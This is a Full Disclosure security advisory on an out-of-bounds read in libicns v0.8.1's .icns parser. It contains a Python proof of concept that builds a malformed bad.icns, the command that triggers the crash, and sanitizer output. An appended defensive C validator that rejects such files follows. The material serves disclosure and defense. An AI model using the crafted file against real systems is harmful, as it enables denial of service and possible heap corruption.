Full Disclosure mailing list archives

libicns v0.8.1 Out-of-Bounds Read in libicns icns_family.c when parsing malformed .icns files


From: Ron E <ronaldjedgerson () gmail com>
Date: Thu, 11 Sep 2025 03:19:08 -0400

libicns fails to validate element size fields in .icns files properly. A
crafted file can cause the library to allocate insufficient memory for an
icns_family_t structure. When icns_family.c treats this undersized memory
as a complete struct, it dereferences members that lie beyond the allocated
space. This results in an Out-of-Bounds Read (CWE-125). Depending on
subsequent code paths, these invalid member references may also be written
to, escalating to an Out-of-Bounds Write (CWE-787).

*Impact:*

   - Out-of-Bounds Read → crash (Denial of Service).
   - If invalid struct members are later updated, this may cause Out-of-Bounds Write and heap corruption.
   - With controlled heap layouts, an attacker could leverage the writes for arbitrary code execution.
*Proof of Concept:*

Save as bad.icns:
---
import struct

data  = b'icns'
data += struct.pack('>I', 32)       # fake file size
data += b'ic07'                     # 128x128 ARGB type
data += struct.pack('>I', 16)       # bogus element size
data += b'\xff' * 8                 # filler

open('bad.icns','wb').write(data)
---

./icnsutil -c icns -o out.png bad.icns


*Output:*
icns_family.c:58:2: runtime error: member access within address
0x502000000030 with insufficient space for an object of type
'icns_family_t' (aka 'struct icns_family_t') 0x502000000030: note: pointer
points here 00 00 00 00 be be be be be be be be 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00
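
As an added example, not part of this advisory and not libicns's own code, the following C validator walks an .icns container and rejects the size inconsistencies the report describes before any allocation or struct view is sized from them. It assumes the public .icns layout (an 8-byte file header of magic plus big-endian total length, then elements whose big-endian size field counts their own 8-byte header); the enum, function names and `icns_alloc_size` helper are hypothetical, and the sample buffers are constructed, the first being exactly the bytes the PoC script above writes.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Layout assumed here (the public .icns container format): an 8-byte file
 * header, magic "icns" plus a big-endian total length, followed by elements
 * that each start with a 4-byte type and a big-endian size that counts the
 * 8-byte element header itself. Names below are hypothetical stand-ins, not
 * libicns's own icns_family_t handling. */
#define ICNS_FILE_HEADER_LEN    8u
#define ICNS_ELEMENT_HEADER_LEN 8u

enum icns_status {
    ICNS_OK = 0,
    ICNS_ERR_SHORT_HEADER,      /* fewer than 8 bytes in total */
    ICNS_ERR_BAD_MAGIC,         /* does not start with "icns" */
    ICNS_ERR_SIZE_MISMATCH,     /* header length != bytes actually present */
    ICNS_ERR_ELEMENT_TOO_SMALL, /* element size < its own 8-byte header */
    ICNS_ERR_ELEMENT_OVERRUN    /* element size runs past end of buffer */
};

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Checks every size field against the bytes actually present before any
 * caller sizes an allocation or a struct view from it. On ICNS_OK, *count
 * (if non-NULL) receives the number of elements found. */
int icns_validate(const uint8_t *buf, size_t len, size_t *count) {
    if (len < ICNS_FILE_HEADER_LEN) return ICNS_ERR_SHORT_HEADER;
    if (memcmp(buf, "icns", 4) != 0) return ICNS_ERR_BAD_MAGIC;
    if (be32(buf + 4) != len) return ICNS_ERR_SIZE_MISMATCH;

    size_t off = ICNS_FILE_HEADER_LEN, n = 0;
    while (off < len) {
        /* Need a whole element header before its size field can be read. */
        if (len - off < ICNS_ELEMENT_HEADER_LEN) return ICNS_ERR_ELEMENT_OVERRUN;
        uint32_t esize = be32(buf + off + 4);
        if (esize < ICNS_ELEMENT_HEADER_LEN) return ICNS_ERR_ELEMENT_TOO_SMALL;
        if (esize > len - off) return ICNS_ERR_ELEMENT_OVERRUN;
        off += esize;
        n++;
    }
    if (count) *count = n;
    return ICNS_OK;
}

/* When a size field from the file drives an allocation that code will then
 * treat as a struct, never allocate less than that struct; struct_size is
 * the sizeof() of whatever the caller will cast the buffer to. */
size_t icns_alloc_size(uint32_t field_size, size_t struct_size) {
    return field_size > struct_size ? (size_t)field_size : struct_size;
}

/* Constructed inputs. poc_bytes is what the advisory's Python script
 * writes: the header claims 32 bytes but only 24 exist. */
const uint8_t poc_bytes[24] = {
    'i','c','n','s', 0,0,0,32,
    'i','c','0','7', 0,0,0,16,
    0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff
};
/* Same bytes with an honest file length: structurally consistent. */
const uint8_t consistent_bytes[24] = {
    'i','c','n','s', 0,0,0,24,
    'i','c','0','7', 0,0,0,16,
    0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff
};
/* Element size smaller than its own 8-byte header. */
const uint8_t tiny_element_bytes[24] = {
    'i','c','n','s', 0,0,0,24,
    'i','c','0','7', 0,0,0,4,
    0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff
};
/* Element size larger than the bytes that follow it. */
const uint8_t overrun_element_bytes[24] = {
    'i','c','n','s', 0,0,0,24,
    'i','c','0','7', 0,0,0,32,
    0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff
};

int main(void) {
    size_t n = 0;
    printf("poc:        %d\n", icns_validate(poc_bytes, sizeof poc_bytes, NULL));
    int rc = icns_validate(consistent_bytes, sizeof consistent_bytes, &n);
    printf("consistent: %d (%zu element)\n", rc, n);
    printf("tiny:       %d\n", icns_validate(tiny_element_bytes, sizeof tiny_element_bytes, NULL));
    printf("overrun:    %d\n", icns_validate(overrun_element_bytes, sizeof overrun_element_bytes, NULL));
    return 0;
}
```

The file-length check is what stops the PoC: its header claims 32 bytes while only 24 are present, so any allocation sized from the header rather than from the real length ends up shorter than the data or struct it is later treated as. The element checks cover the complementary cases (a size field smaller than the element header, or one that reaches past the end of the buffer), and `icns_alloc_size` shows the clamp a size-driven allocation needs when the result is cast to a fixed-layout struct.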
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/